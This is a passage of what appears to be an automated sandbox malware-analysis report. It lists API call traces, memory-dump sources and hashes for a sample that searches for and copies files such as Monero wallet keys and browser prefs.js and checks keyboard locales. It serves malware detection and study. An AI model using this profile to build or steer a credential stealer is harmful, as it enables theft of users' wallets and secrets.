                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006315B8,00630D96), ref: 0061F71E
                          • StrCmpCA.SHLWAPI(?,006315BC), ref: 0061F76F
                          • StrCmpCA.SHLWAPI(?,006315C0), ref: 0061F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0061FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: bda18b682d515fd6afb45ec02f100349fc7466307ad4c48521eb3e8043b8a6a9
                          • Instruction ID: 43d5a5367681abd46212f161122fc309c6a25b1cd63e12c492acb26c57937eb9
                          • Opcode Fuzzy Hash: bda18b682d515fd6afb45ec02f100349fc7466307ad4c48521eb3e8043b8a6a9
                          • Instruction Fuzzy Hash: 6EB165719005189BDB64FFA0EC96AED737BAF54300F4085ACE40A97181EF74AB49CF96
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0063510C,?,?,?,006351B4,?,?,00000000,?,00000000), ref: 00611923
                          • StrCmpCA.SHLWAPI(?,0063525C), ref: 00611973
                          • StrCmpCA.SHLWAPI(?,00635304), ref: 00611989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00611D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00611DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00611E20
                          • FindClose.KERNEL32(000000FF), ref: 00611E32
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 81981fc70809a68b247b7e3c4db6be28069922f71b84ee1eba92e0e838462a84
                          • Instruction ID: 6f9873a3d080bbdccfc68a32b01ae690a95a6a1fb8e6c5105c09cafd4793329d
                          • Opcode Fuzzy Hash: 81981fc70809a68b247b7e3c4db6be28069922f71b84ee1eba92e0e838462a84
                          • Instruction Fuzzy Hash: 8F1295719115289BCB59FBA0EC96EEE733AAF14300F40459DF10662091EFB46F89CF96
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00630C2E), ref: 0061DE5E
                          • StrCmpCA.SHLWAPI(?,006314C8), ref: 0061DEAE
                          • StrCmpCA.SHLWAPI(?,006314CC), ref: 0061DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0061E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 6049e71031965e4710535b15e43f1e736adb312cdacc6af9cad6ab2c9d9ed7fe
                          • Instruction ID: b1edf19aeadbfac2b4b94d77124d10be387e7ab84cd7bb0ae2c4cc1900a1cfad
                          • Opcode Fuzzy Hash: 6049e71031965e4710535b15e43f1e736adb312cdacc6af9cad6ab2c9d9ed7fe
                          • Instruction Fuzzy Hash: 3FF190718105289BDB59EBA0EC95EEE737ABF18300F4045DDE40A62091EF746B8ACF56
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: wz$$7$0L>$@GO$@dm$HG{}$h "i$ra>$h~;$9w
                          • API String ID: 0-1766348267
                          • Opcode ID: c2d6116cac7547c841c5b47e5db22991045b9c42992c144677d45a16b8bab8a2
                          • Instruction ID: f584fc852e82aa53fb82dc8a67cd20cd127a62712769553dad8fab6e6fbff937
                          • Opcode Fuzzy Hash: c2d6116cac7547c841c5b47e5db22991045b9c42992c144677d45a16b8bab8a2
                          • Instruction Fuzzy Hash: 05B204F36082049FE3046E2DEC8567ABBE9EFD4720F1A493DE6C4C7744EA3598058697
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006314B0,00630C2A), ref: 0061DAEB
                          • StrCmpCA.SHLWAPI(?,006314B4), ref: 0061DB33
                          • StrCmpCA.SHLWAPI(?,006314B8), ref: 0061DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0061DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: a413e0819028189fb09a693575bb1fd6d68afaa47d83afca38e0d0afe251dd29
                          • Instruction ID: da8985cb7d86ce4cf22513da661b114af455bb029f09e94d09b73e048b1dd8de
                          • Opcode Fuzzy Hash: a413e0819028189fb09a693575bb1fd6d68afaa47d83afca38e0d0afe251dd29
                          • Instruction Fuzzy Hash: A29124769005149BCB54FBB0EC969ED737FAF88300F40866CF90696181EE749B498F97
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,006305AF), ref: 00627BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00627BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00627C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00627C62
                          • LocalFree.KERNEL32(00000000), ref: 00627D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: d0c3e1a712504e971edff5bb840f7f84e1d2717e97bd82daff61ccac605d7b17
                          • Instruction ID: b2c83e3205ea87e06a41eef493324eb505e37b33d48445645ce28dbaf6388c42
                          • Opcode Fuzzy Hash: d0c3e1a712504e971edff5bb840f7f84e1d2717e97bd82daff61ccac605d7b17
                          • Instruction Fuzzy Hash: 22418F71940628ABCB24DB94EC99FEDB379FF48700F2042D9E00962281DB742F85CFA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +p~o$."K+$:-~w$T&wo$YRD{$k?o~$~30
                          • API String ID: 0-1783079507
                          • Opcode ID: d9cba92aa0c738b829a914f17db3bd5adb17e7b6012129268f30caf196722147
                          • Instruction ID: 0f24e45c153c0e96316e58be8ead46a3e487dc9b9746347daf49d9db6a7f4336
                          • Opcode Fuzzy Hash: d9cba92aa0c738b829a914f17db3bd5adb17e7b6012129268f30caf196722147
                          • Instruction Fuzzy Hash: F6B2E5F3A0C2049FD304AE2DEC8567AFBE5EF94720F164A2DEAC4D3744EA3558058697
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00630D73), ref: 0061E4A2
                          • StrCmpCA.SHLWAPI(?,006314F8), ref: 0061E4F2
                          • StrCmpCA.SHLWAPI(?,006314FC), ref: 0061E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 8718670a281dbb72213cf5acdd98c4f84aa39c05acc5404abdede2a0223544e9
                          • Instruction ID: b21175a34fd560b740035278e0af09e09fc64d0e337a243156b2d7a306bdf0b9
                          • Opcode Fuzzy Hash: 8718670a281dbb72213cf5acdd98c4f84aa39c05acc5404abdede2a0223544e9
                          • Instruction Fuzzy Hash: 4712A2719105289BDB58FBA0EC96EED733AAF54300F4041ACF50A56081EF746F89CF9A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +Y[^$<a/$AQ>=$\$mDKz$r~K
                          • API String ID: 0-4162694993
                          • Opcode ID: 66c2b10807567387c61f29622a6d05dd334f46dd87a8b8e52896a77fa8ba35be
                          • Instruction ID: e964e91f25d3156e9d24d6992c6cc077eabf6442b2b87494cbc2140acc5d4164
                          • Opcode Fuzzy Hash: 66c2b10807567387c61f29622a6d05dd334f46dd87a8b8e52896a77fa8ba35be
                          • Instruction Fuzzy Hash: E2B2D9F390C2109FE304AE29DC8567ABBE9EF94720F16493DEAC9D3744E63598018797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'Ogw$0#u$?_[{$[7a~$[;x$lH.o
                          • API String ID: 0-1921790539
                          • Opcode ID: bee0c8c8c5da3e1ccf95b6799e63b2b113b6b58db9559598ca032669dece16f6
                          • Instruction ID: 757c1fdf15e2f32fdbd6efd092eb6d78a954c15441f345cea10fb3b177e1a6e0
                          • Opcode Fuzzy Hash: bee0c8c8c5da3e1ccf95b6799e63b2b113b6b58db9559598ca032669dece16f6
                          • Instruction Fuzzy Hash: 4BB209F3A0C6109FE304AE29EC8567AF7E5EF94720F16893DEAC4C3744E63598058697
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00614EEE,00000000,?), ref: 00619B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619B2A
                          • LocalFree.KERNEL32(?,?,?,?,00614EEE,00000000,?), ref: 00619B3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
